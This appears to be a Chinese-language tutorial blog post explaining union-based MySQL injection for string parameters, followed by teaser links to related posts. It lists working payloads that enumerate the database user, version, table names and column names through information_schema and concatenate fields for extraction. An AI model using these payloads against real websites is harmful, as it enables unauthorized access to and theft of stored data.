mysql注入语句解释,MYSQL注入语句实用精解
MYSQL注入语句实用精解
只讲字符型。
order by XX
Union select .....
1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。
1' UNION SELECT 1,CONCAT_WS(CHAR(58),user(),database(),version()) #
上面是字符型的,注释符为 # , CONCAT_WS 为用分隔符隔开连接的字符。
获取数据库等的信息
1' UNION SELECT 1,concat(table_name) from information_schema.tables where table_schema=database() #
concat产生只是字符串连接,不用也可以,也应该可以把所有表输出。table_name 和 table_schema 是 information_schema中tables表中的一个字段。
1' UNION SELECT 1,concat(column_name) from information_schema.columns where table_name=0x7573657273 #
0x7573657273这个是users的十六进制表示形式。这个users只是一个特例而已。主要根据上面获得表中字段值进行查询。到了这里,数据库知道了,表知道了,表的字段也知道了。剩下的还不会查吗。直接union 查。
库information_schema 中的表tables 有 table_schema(数据库名) 和 table_name(表名) 两个主要字段
库information_schema 中的表columns 有 table_name(表名) 和 column_name(列名) 两主要字段
就算是 order by 出来只有一个可以显示也没关系。可以用concat
如: concat(字段,0x3a,字段) 把两个字段显示出来了。中间那个是 : 的十六进制表示形式。
mysql注入语句解释,MYSQL注入语句实用精解相关推荐
- java网络编程实用精解_Java网络编程实用精解
Java网络编程实用精解 作者:盛华 出版日期:2009年10月 文件大小:17.38M 支持设备: ¥30.00 适用客户端: 言商书局 iPad/iPhone客户端:下载 Android客户端:下 ...
- mysql分页语句解释,mysql语句分页limit什么意思
mysql语句分页limit什么意思 主要是取数据条数用的 比如取前几条或者中间某几条数据 举两个例子吧 limit 10 (limit 0,10的缩写)这个表示取前十条 limit 2,10 从第三 ...
- Oracle 分页语句解释,oracle 分页语句
private static final String QUERYPERPAGESQL = "select * from (select m.*, rownum rn from (selec ...
- oracle分页语句解释,oracle分页语句
以Student表为例进行分页 纯sql分页 SELECT * FROM ( SELECT ROWNUM,A.* FROM ( SELECT * FROM STUDENT ORDER BY creat ...
- concat mysql sql注入_sql注入-mysql注入基础及常用注入语句
最近在教学中,关于SQL注入,总发现学生理解起来有些难度,其实主要的原因是对各类数据库以及SQL语句不熟悉,今天先介绍mysql注入需要掌握的基础, Mysql内置information_schema ...
- php使用mysql预处理语句防止sql注入 简单讲解及代码实现
目录 前言 sql注入简单介绍 一个例子 使用预处理语句 简介 预处理语句的查询 预处理语句获取查询结果 总结 前言 最近在做一个小项目的后台,牵扯到登录等等需要操作数据库的地方,为了安全起见,特地来 ...
- MySQL数据库学习笔记(九)----JDBC的ResultSet接口(查询操作)、PreparedStatement接口重构增删改查(含SQL注入的解释)...
[声明] 欢迎转载,但请保留文章原始出处→_→ 生命壹号:http://www.cnblogs.com/smyhvae/ 文章来源:http://www.cnblogs.com/smyhvae/p/4 ...
- 05_SQL注入_功能语句报错注入盲注
05_SQL注入_功能语句&报错回显&盲注 1. SQL 语句和网站功能 1.1 Web开发中常见语句 [本章代码来源于pikachu和sqli-lab中的靶场] 开发中,根据不同的需 ...
- php mysql 防 sql注入_php 防sql注入方法
php防sql注入的方法:1.使用mysql_real_escape_string方法转义SQL语句中使用的字符串中的特殊字符:2.打开magic_quotes_gpc来防止SQL注入:3.通过自定义 ...
最新文章
- 《程序员代码面试指南》第二章 链表问题 搜索二叉树转换为双向链表
- springboot配置多个数据库环境
- UVa 439 - Knight Moves
- XShell——使用
- 经典英语1000句(转)
- 客户成功案例 | 台湾杜邦:提升制程能力的法宝 — 先进的数据分析
- 等参元:平面四节点四边形等参元的刚度矩阵的计算
- 战士的升级速度不可能同法师相比,道士相比也有一定差距
- java 线程 设计模式_Java多线程设计模式(四)
- 头歌-自己动手画CPU(第一关)-8位可控加减法器-Logisim
- 关于iPhone边缘触摸延迟现象
- ROS入门教程(六)—— Gazebo仿真
- 分享一个英语听力资源下载网站
- 毕节职业技术学院计算机网络技术专业,毕节职业技术学院计算机网络技术9.顶岗实习安排...
- C补习--------->第六天,二级指针、指针和数组的关系、选择排序
- 谁是软件测试的利益相关者?如何识别它们?
- slb健康检查方式_负载均衡(SLB)
- 分享跨境电商亚马逊大件产品运营方案案例
- Coding and Paper Letter(十)
- 从管理看:华为如何应对全球化带来的挑战?
热门文章
- CSS基础(part7)--字体样式属性
- 《终身成长》读书笔记(part6)--真正的自信来源于你的思维模式:你已经做好了成长的准备
- 计算机会计的专业知识竞赛,会计知识大赛主持词范文
- Python入门知识点总结
- SAP 电商云 Spartacus UI 实现的 ngrx-router-store.js 的 serializer
- SAP CRM WebClient UI 培训教程
- 如何以 mock server 的方式本地启动 SAP UI5 应用,使它不连接服务器端 OData 服务
- SAP Spartacus批量读取产品的逻辑
- 另一种办法直接在宿主机上的文件夹内查看Docker镜像运行的日志文件
- create-react-app应用的入口定义